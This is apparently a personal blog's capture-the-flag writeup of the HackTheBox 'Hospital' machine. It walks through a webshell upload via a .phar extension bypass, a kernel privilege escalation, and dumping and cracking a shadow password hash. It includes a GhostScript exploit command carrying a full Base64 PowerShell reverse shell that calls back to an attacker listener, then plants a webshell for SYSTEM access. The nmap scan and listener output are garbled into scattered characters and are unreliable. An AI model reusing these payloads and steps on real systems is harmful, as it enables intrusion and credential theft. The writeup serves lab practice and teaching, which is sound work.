cwoellner.com ~ personal website & blog

Writeup of Hospital From HackTheBox

Published on: Thursday, Dec 19, 2024

Getting a foothold

For the initial port scan, I use the following nmap command:

nmap -sS -A -Pn -T5 -p- -oN nmap.txt 10.129.229.189

And receive the following results:

P 2 5 8 1 1 3 4 4 4 5 6 1 2 2 2 2 3 3 3 5 6 6 6 6 6 6 6 8 9 O 2 3 8 3 3 8 _ 4 _ _ _ _ 4 6 9 3 _ 8 1 1 1 1 2 _ 2 _ 3 _ 9 _ _ 0 4 4 4 4 6 6 0 3 R / s / / 5 9 9 s S N N 3 t s N N s h h 5 4 3 6 s S N N 0 0 0 0 7 6 s S N N 6 s S N N 8 s N N 8 h h 5 0 0 0 0 1 3 8 8 T t s t t / / / s u o o / l s o o s t t / / / / s u o o 1 3 5 7 9 8 s u o o 9 s u o o 9 s o o 5 t t 9 4 6 7 9 5 6 0 9 c h 2 2 c c t t t l b t t t s h l t t l t t t t t t l b t t / / / / / / l b t t / l b t t / l t t / t t / / / / / / / / / p - 5 5 p p c c c - j c - t - - p p c c c c - j t t t t t t - j t - j t - t p p t t t t t t t t t h 6 6 p p p c e v v p a t c v v d - - p p p p c e v v c c c c c c c e v v c c e v v c c v v c - - c c c c c c c c c o e c a a l p e a a a s t e c a a p p p p p p e c a a p e c a a p e a a p s t p p p p p p p p p s e 9 r t l l p / r l l t e i r t l l r t l l r t l l r l l e i S o t 1 6 o o o o o t i i o n 1 t i i e r t o o o o t i i o o o o o o t i i o t i i o t i i o r t o o o o o o o c o T p k : : p p p p p : A d d p : . : d d : v l p p p p : A d d p p p p p p : A d d p : A d d p : d d p v l p p p p p p p l p A e e 4 c e e e e e l e 1 e e e e e e l e e e e e e l e l e e e e e e e e e e e o e T n y b 1 n n n n n S t b a n S b a T r : n n n n S t b a n n n n n n S t b a n S t b a n S b a n r : n n n n n n n s n E : : : u e e f u e f L - u e e f u e e f u e e f u e f - e 4 d b r f t b f t S h H b r f t b r f t b r f t b f t h N d b c j n o e j o e e o j n o e j n o e j n o e j o e e o S s : : d k m n l e a r r s e r r r a s m k n l e a r r m m m m v l e a r r g e a r r m e r r h a t m m n m m m m h m E s 3 d o e s e d c t e : s c e : a d p i p c d c t e : s s s s m d c t e : l c t e : s c e : t d s s c s s s s t c R h a 8 m r r t a t i : l t : n e i c a a a t i : m r r r r a t i : o t i : - t : t e F r r a r r r r t - V : : a b p b p : v / : d r t r s c p : v q p p p d p : v b : v w : p r o p p c p p p p p n I 6 9 i e c i e 2 2 h 2 2 o : a o s n s e 2 2 ? c c c p e 2 2 a e 2 2 b 2 2 : u c c n c c c c - m C d 7 n r o c 0 0 t c 0 0 m l s w _ s c 0 0 ? c 0 0 l c 0 0 t c 0 0 n _ p f E : : o s o N 2 2 t o 0 1 n A o d h l o N 2 2 o N 2 2 c o N 2 2 - o 2 2 M d h r 1 2 s - m a 3 8 p m 9 9 e p W f 5 t ? m a 3 8 m a 3 8 a m a 3 8 s m 3 4 i t o 8 0 - s m m - - m - - s a e t ? t m m - - m m - - t m m - - e m - - c t x : : s s o e 0 0 o 1 1 s c b - p o e 0 0 o e 0 0 L o e 0 0 r o 0 0 r p y 6 9 e n n : 9 9 n 1 1 h m d n : 9 9 n : 9 9 D n : 9 9 v n 9 3 o 6 5 c N - - N - - d e a s N - - N - - A N - - e N - - s : : a D 0 0 a 1 0 o / i ? a D 0 0 a D 0 0 P a D 0 0 r a 0 0 o 6 e m N 6 6 m 0 8 e 2 l m N 6 6 m N 6 6 s m N 6 6 m 5 6 f 9 7 e S T T e T T s . e S T T e S T T s e S T T e T T t : : = : 1 1 = 2 2 4 : = : 1 1 = : 1 1 l = : 1 1 = 1 1 - 3 0 D D 0 0 l 3 3 n . : D D 0 0 D D 0 0 ? D D 0 0 D 8 8 H 9 1 C C : : o : : o 5 C C : : C C : : C C : : C : : T V O : : S M M M M , 4 4 A c 4 4 t 6 W M , 4 4 M M M M , 4 4 , 4 4 M . 3 3 M T M M M M M M M . E p f 5 i i i i i 9 9 p a 8 8 e i 9 9 i i i i 9 9 9 9 i h 9 9 i P i i i i i i i N R e 7 f m c c c c D : : a l : : r ( l c D : : c c c c D : : D : : c o : : c A c c c c c c c E S n : : p r r r r N 0 0 c h 4 4 e W c r N 0 0 r r r r N 0 0 N 0 0 r s 3 3 r P r r r r r r r T I S a 2 l o o o o S 3 3 h o 7 7 p i o o S 3 3 o o o o S 3 3 S 3 3 o p 4 4 o I o o o o o o o O S a 0 e s s s s : e s r n m s : s s s s : : s i s s s s s s s s M N H : : o o o o D t e 6 e o D o o o o D D o t 2 o o o o o o o e 7 a D f f f f C h s 4 f C f f f f C C f a f . f f f f f f f s 9 4 2 N t t t t . t e ) t t . t t t t . . t l t 0 t t t t t t t s . : : S h t n o h h h . a 0 b 4 W W W W o p t O W o W W W W o o T h H W W W W W W W g p 3 3 P i i i i s d p H i s i i i i s s e t T i i i i i i i e 1 : : l n n n n p t e o n p n n n n p p r b T n n n n n n n 1 6 u d d d d i 2 i n s d i d d d d i i m P d d d d d d d F U 6 1 s o o o o t . m S p o t o o o o t t i A o o o o o o o r b : : w w w w a 4 e S i w a w w w w a a n P w w w w w w w a u 0 c s s s s l . L t s l s s s s l l a I s s s s s s s m n a b . 5 / a . . . l i t : : K R n A h 6 1 l R h R R R A h h h R R R R R R R n u a c e P e c t . P t P P P c t t S t P P P P P P P g a a r C t t b 1 W C b C C C t b b e t C C C C C C C 1 b b i ( . e i r p u ( ( e i v W 1 b v v d b E E r o e i t m v e i v u C D o s n a e c 2 e n D 2 s - D 6 P i r D e . r t S 5 s i 4 H l i s 0 u A 5 ( s r ) P H r H 8 ) 1 s n e / T e ( T . 9 e c O 8 T c S T 5 ) r t p . P t S P v o e 0 o D ( e r n . 1 r P 1 U r y S 2 . y / . b S 8 0 U 0 u t L L L P n i D / D n t m A 1 A P u e P . P ) : 1 L ( . ( i 2 D 1 D n 0 o t o u 2 m m x 3 a P a ; - i H i 1 n P n p 1 : / : r - 8 o 1 h . h t 9 o 0 o o s . s c 0 p 2 p o 4 i 8 i l : t ) t 4 a a 2 0 l l . : . . 0 0 h h ) 2 t t Z b b ) 0 0 . . , , S S i i t t e e : : D D e e f f a a u u l l t t - - F F i i r r s s t t - - S S i i t t e e - - N N a a m m e e ) )

I start by checking the service on port 443 and discover an instance of Roundcube webmail, since there are no recent unauthenticated exploits for Roundcube I check the other services. On port 8080 I find a simple web app that allows me to create an account and to upload a file. I use the p0wny@shell:~# and try different file extensions. The upload succeeds with a .phar file extension. The uploaded file can be found in the /uploads/ directory.

Pwning the container

Using the shell I find out that I am in an Ubuntu container.

www-data@webserver:…/html/uploads uname -a
Linux webserver 5.19.0-35-generic #36-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 3 18:36:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

I try to exploit CVE-2021-3493, which tends to work on most Ubuntu systems. I upload the exploit and run it, It works but the webshell cannot handle it, so I use the webshell to run a reverse shell and use the exploit from there.

After running the exploit again and getting a root shell, I take a look at /etc/shadow and dump the password hash for drwilliams.

d r w i l l i a m s : $ 6 $ u W B S e T c o X X T B R k i L $ S 9 i p k s J f i Z u O 4 b F I 6 I 9 w / i I t u 5 . O h o z 3 d A B e F 6 Q W u m G B s p U W 3 7 8 P 1 t l w a k 7 N q z o u o R T b r z 6 A g 0 q c y G Q x W 1 9 2 y / : 1 9 6 1 2 : 0 : 9 9 9 9 9 : 7 : : :

I then use hashcat to crack the password.

hashcat -m 1800 pw.hash rockyou.txt --show
$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@#

User flag

Using the credentials drwilliams:qwe123!@# I log into Roundcube webmail. I find a mail telling me to send a GhostScript file. So I look for recent GhostScript RCEs and find CVE-2023-36664

mail

I use RevShells to generate a Base64 encoded PowerShell reverse shell and a add the code as the payload for the exploit generator.

python3 CVE_2023_36664_exploit.py -g -x eps -p "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="

I send the generated .eps file to Dr. Brown and wait for the reverse shell to connect back to my listener.

$ L C P i o S n s n c t n C e e : - n c \ l i t U n n i s v g o e p n r o s 1 n r \ 2 e d 3 0 c r 4 . e b 0 i r . v o 0 e w . d n 0 . o H 1 n O 2 S 3 1 P 4 0 I . T 1 A 2 L 9 \ . D 2 o 2 c 9 u . m 1 e 8 n 9 t s 6 > 2 3 0

Now I can now use the reverse shell to navigate to the Desktop folder and obtain the user flag.

Administrator flag

I start by running winpeas and see that I have write access to C:\xampp, so check the folder and find out that this is where Roundcube is being hosted.

I put the p0wny@shell:~# from earlier in the htdocs folder (this time as a .php file) and access it via the browser.

system shell

Now I can use the shell to obtain the root flag from the Administrators desktop.